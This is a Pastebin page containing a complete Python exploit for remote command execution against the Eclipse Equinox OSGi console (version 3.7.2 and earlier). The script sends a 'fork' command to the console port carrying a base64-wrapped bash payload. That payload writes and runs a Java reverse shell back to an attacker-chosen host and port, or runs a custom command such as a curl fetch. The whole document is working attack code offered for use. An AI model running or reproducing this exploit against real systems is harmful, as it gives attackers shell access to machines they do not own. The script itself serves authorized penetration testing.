FlyFar

OSGi v3.7.2 (and below) Console - RCE

Mar 13th, 2024
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.75 KB | Cybersecurity | 0 0
  1. #!/usr/bin/python
  2.  
  3. # Exploit Title: [OSGi v3.7.2 Console RCE]
  4. # Date: [2023-07-28]
  5. # Exploit Author: [Andrzej Olchawa, Milenko Starcik,
  6. #                  VisionSpace Technologies GmbH]
  7. # Exploit Repository:
  8. #           [https://github.com/visionspacetec/offsec-osgi-exploits.git]
  9. # Vendor Homepage: [https://eclipse.dev/equinox]
  10. # Software Link: [https://archive.eclipse.org/equinox/]
  11. # Version: [3.7.2 and before]
  12. # Tested on: [Linux kali 6.3.0-kali1-amd64]
  13. # License: [MIT]
  14. #
  15. # Usage:
  16. # python exploit.py --help
  17. #
  18. # Examples:
  19. # python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \
  20. #   --lport=4444
  21. #
  22. # python exploit.py --rhost=localhost --rport=1337 --payload= \
  23. #   "curl http://192.168.100.100/osgi_test"
  24.  
  25.  
  26. """
  27. This is an exploit that allows to open a reverse shell connection from
  28. the system running OSGi v3.7.2 and earlier.
  29. """
  30. import argparse
  31. import base64
  32. import socket
  33.  
  34.  
  35. def parse():
  36.     """
  37.    This fnction is used to parse and return command-line arguments.
  38.    """
  39.  
  40.     parser = argparse.ArgumentParser(
  41.         prog="OSGi-3.7.2-console-RCE",
  42.         description="This tool will let you open a reverse shell from the "
  43.                     "system that is running OSGi with the '-console' "
  44.                     "option in version 3.7.2 (or before).",
  45.         epilog="Happy Hacking! :)",
  46.     )
  47.  
  48.     parser.add_argument("--rhost", dest="rhost",
  49.                         help="remote host", type=str, required=True)
  50.     parser.add_argument("--rport", dest="rport",
  51.                         help="remote port", type=int, required=True)
  52.     parser.add_argument("--lhost", dest="lhost",
  53.                         help="local host", type=str, required=False)
  54.     parser.add_argument("--lport", dest="lport",
  55.                         help="local port", type=int, required=False)
  56.     parser.add_argument("--payload", dest="custom_payload",
  57.                         help="custom payload", type=str, required=False)
  58.     parser.add_argument("--version", action="version",
  59.                         version="%(prog)s 0.1.0")
  60.  
  61.     args = parser.parse_args()
  62.  
  63.     if args.custom_payload and (args.lhost or args.lport):
  64.         parser.error(
  65.             "either --payload or both --lport and --rport are required.")
  66.  
  67.     return args
  68.  
  69.  
  70. def generate_payload(lhost, lport, custom_payload):
  71.     """
  72.    This function generates the whole payload ready for the delivery.
  73.    """
  74.  
  75.     payload = ""
  76.  
  77.     if custom_payload:
  78.         payload = custom_payload
  79.  
  80.         print("(*) Using custom payload.")
  81.     elif lhost and lport:
  82.         payload = \
  83.             "echo 'import java.io.IOException;import java.io.InputStream;" \
  84.             "import java.io.OutputStream;import java.net.Socket;class Rev" \
  85.             "Shell {public static void main(String[] args) throws Excepti" \
  86.             "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \
  87.             "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \
  88.             ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \
  89.             "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \
  90.             "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \
  91.             ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \
  92.             "e(pe.available()>0)so.write(pe.read());while(si.available()>" \
  93.             "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \
  94.             ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \
  95.             ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (
  96.                 lhost, lport)
  97.  
  98.         print("(+) Using Java reverse shell payload.")
  99.  
  100.     bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (
  101.         base64.b64encode(payload.encode()))
  102.  
  103.     wrapped_payload = b"fork \"%s\"\n" % (bash_payload)
  104.  
  105.     return wrapped_payload
  106.  
  107.  
  108. def deliver_payload(rhost, rport, payload):
  109.     """
  110.    This function connects to the target host and delivers the payload.
  111.    It returns True if successful; False otherwise.
  112.    """
  113.  
  114.     print("(*) Sending payload...")
  115.  
  116.     try:
  117.         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  118.         sock.connect((rhost, rport))
  119.         sock.send(payload)
  120.         sock.close()
  121.     except socket.error as err:
  122.         print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
  123.         print(err)
  124.         return False
  125.  
  126.     return True
  127.  
  128.  
  129. def main(args):
  130.     """
  131.    Main function.
  132.    """
  133.  
  134.     payload = generate_payload(args.lhost, args.lport, args.custom_payload)
  135.  
  136.     success = deliver_payload(args.rhost, args.rport, payload)
  137.     if success:
  138.         print("(+) Done.")
  139.     else:
  140.         print("(-) Finished with errors.")
  141.  
  142.  
  143. if __name__ == "__main__":
  144.     main(parse())
  145.            
Add Comment
Please, Sign In to add comment